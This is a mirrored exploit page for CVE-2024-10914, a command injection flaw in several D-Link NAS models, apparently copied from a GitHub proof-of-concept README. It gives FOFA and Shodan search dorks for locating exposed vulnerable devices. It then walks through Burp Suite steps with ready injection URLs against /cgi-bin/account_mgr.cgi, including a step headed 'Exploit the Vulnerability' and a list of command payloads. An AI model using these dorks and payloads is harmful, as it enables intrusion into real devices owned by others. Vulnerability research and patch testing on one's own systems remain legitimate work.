Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-10914 PoC — D-Link多款产品 安全漏洞

Source
https://github.com/Egi08/CVE-2024-10914
Associated Vulnerability
Title:D-Link多款产品 安全漏洞 (CVE-2024-10914)
Description:D-Link DNS-320等都是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。 D-Link多款产品存在安全漏洞,该漏洞源于对参数name的错误操作会导致操作系统命令注入。以下产品及版本受到影响:D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L 20241028版本及之前版本。
Description
CVE-2024-10914_Manual testing with burpsuite
Readme
# CVE-2024-10914 Command Injection Vulnerability Testing for D-Link NAS_Manual testing with burpsuite 

---

## Dork for Finding Vulnerable Devices

Use the following search dork to find potentially vulnerable D-Link NAS devices:

```

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 
```

This search string helps identify devices running the vulnerable D-Link DNS ShareCenter app with the specific version of the Lighttpd server that is affected by the vulnerability.

---

This guide provides step-by-step instructions on how to manually test for a Command Injection Vulnerability (CVE-2024-10914) in the `name` parameter of D-Link NAS using Burp Suite. Target URL: `http://Target`.

## Prerequisites
- Burp Suite
- A web browser configured to use Burp Suite as a proxy (typically set to `127.0.0.1:8080`)

---

## Step 1: Set Up Burp Suite
1. **Launch Burp Suite**: Start Burp Suite on your machine.
2. **Configure Proxy**: Ensure your browser is configured to use Burp Suite as its proxy by setting the browser's proxy settings to `127.0.0.1` on port `8080`.

---

## Step 2: Intercept the Request
1. **Navigate to the Target**: In your browser, go to `http://Target`.
2. **Enable Intercept**: In Burp Suite, enable the intercept feature to capture the outgoing request.

---

## Step 3: Modify the Request
1. **Locate the Vulnerable Parameter**: In the intercepted request, find the `name` parameter in the URL. It should appear as:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
   ```

2. **Inject a Test Command**: Modify the `name` parameter to include a test command like `echo "test"`:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
   ```

3. **Send the Modified Request**: Forward the modified request to the server.

---

## Step 4: Analyze the Response
1. **Check the Response**: Look for the output of the injected command in the response. For example, if the server executed `echo "test"`, you should see:

   ```plaintext
   test
   ```

---

## Step 5: Exploit the Vulnerability
1. **Inject a Malicious Command**: If the test is successful, attempt more sophisticated commands, such as:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
   ```

2. **Send the Exploit Request**: Forward this request to the server.
3. **Analyze the Response**: Check if the output of the command (e.g., user ID info) is present in the response.

---

## Step 6: Automate with Burp Suite Extensions (Optional)
1. **Use Intruder**: Automate testing with Burp Suite's Intruder tool.
   - Right-click the request and select **Send to Intruder**.
   - Set the `name` parameter as the payload position.
   - Use a list of commands as payloads for testing.

2. **Example Payloads**:
   ```plaintext
   echo "test"
   id
   uname -a
   ls /etc
   ```

3. **Start Intruder**: Run the Intruder attack to test multiple payloads automatically.

---
File Snapshot

 [4.0K]  /data/pocs/4c24e085a6d8b108ffcbb32b6d7c11b056df24e8
└── [3.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.